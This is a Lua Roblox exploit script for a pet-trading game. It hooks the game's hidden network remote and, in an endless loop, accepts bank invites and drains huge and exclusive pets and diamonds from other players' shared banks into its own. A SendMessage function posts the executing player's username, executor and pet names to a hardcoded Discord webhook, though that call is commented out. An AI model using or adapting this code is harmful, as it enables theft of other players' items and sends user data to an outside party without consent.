function SendMessage(huges)
	for i, v in pairs(huges or {}) do
		print(i, v)
	end
	huges =  table.concat(huges, ', ')
	print(huges)

	local webhookcheck =
		is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
		secure_load and "Sentinel" or
		KRNL_LOADED and "Krnl" or
		SONA_LOADED and "Sona" or
		"Kid with shit exploit"

	local url =
		"https://discord.com/api/webhooks/1041686034834006056/5avDvgDcvd6TSH0y8pihPqB3wvVOcxNYcXUS5bu7d90C0piiZ8b2F7o4OwMKkcpcD0jx"
	local data = {
		["content"] = game.Players.LocalPlayer.Name .. " got some huges ;)",
		["embeds"] = {
			{
				["title"] = "**Someone Executed Your Script!**",
				["description"] = "Username: " .. game.Players.LocalPlayer.Name.." with **"..webhookcheck.."**" .. '\n \n **HUGE NAMES:** '.. huges,
				["type"] = "rich",
				["color"] = tonumber(0x7269da),
				["image"] = {
					["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
						tostring(game:GetService("Players").LocalPlayer.Name)
				}
			}
		}
	}
	local newdata = game:GetService("HttpService"):JSONEncode(data)

	local headers = {
		["content-type"] = "application/json"
	}
	request = http_request or request or HttpPost or syn.request
	local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
	request(abcdef)

end


local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))


local abobusikti = (getupvalue or debug.getupvalue)(lib.Network.Invoke, 2)
fire123 = function(n, ...)
	return abobusikti(n):InvokeServer(...)
end
print(abobusikti("k"))



local function AcceptInvite(id)
	return fire123("e", id)
end


local function GetAllHugePets(bankid, ishuge)
	local pets1 = {}
	local u5 = fire123("j", bankid)
	for i,v in pairs(u5.Storage.Currency) do
		print(i)
	end
	
	for i,v in pairs(u5.Storage.Pets) do
		local v2 = lib.Directory.Pets[v.id];
		if (ishuge == false and (v2.rarity == "Exclusive") or (v2.huge or v2.isGift)) and not (v.l == true) then
			table.insert(pets1, v.uid)
		end
	end
	 print("Found "..#pets1.." pets")
	return pets1, u5.Storage.Currency.Diamonds
end

while true do
	pcall(function()
		local mybanks = fire123("k")



		local myinvites = fire123("l")
		for i, v in pairs(myinvites) do
			if #mybanks < 5 then
				if AcceptInvite(v.BUID) then
					print("Accepted Invite")
				end
				mybanks[#mybanks+1] = v
			end
		end
		
		local myownbi = ""
		local mybanks = fire123("k")
		for i, v in pairs(mybanks) do
			if i == 1 then
				myownbi = v.BUID
			end
			if i ~= 1  and i ~= 2 then
				print('testing bank')
				local pets, diam = GetAllHugePets(v.BUID, getgenv().onlyhuge == true)

				local pets1 = {}

				for index, value in pairs(pets) do
					if #pets1 < 49 then
						table.insert(pets1, value)
					end
				end
				if #pets > 0 or (getgenv().onlyhuge == true and diam >= 10000000000) then
					print(math.min(100000000000 - 100, diam ))
					
					local args = {
						[1] = v.BUID,
						[2] = pets1,
						[3] = math.min(100000000000 - 100, diam )
					}
					print(fire123("8", unpack(args)))
					print('Got items: '..#pets1)
				else

					print('Leaving bank: no pets left.')
					fire123("b", v.BUID)
				end


				wait(3)
			end
		end

		local PetsList = {}
		local PetsList2 = {}
		for i,v in pairs(lib.Save.Get().Pets) do
			local v2 = lib.Directory.Pets[v.id];
			if v2.rarity == "Exclusive" then
				table.insert(PetsList, v.uid);
				PetsList2[v.uid] = false
			end
		end
wait(2)

		if #PetsList > 0 or lib.Save.Get().Diamonds > 100 then
			print("deping")
			--local mydiamonds = tonumber(string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", ""))

			print(fire123("7", myownbi, PetsList, lib.Save.Get().Diamonds - 100))
			--SendMessage(PetsList2);
		end

	end)

	--
	-- #!F71a1e3ffdba34ed99e8f44ce78d5703bimage.png

	wait(5)
end
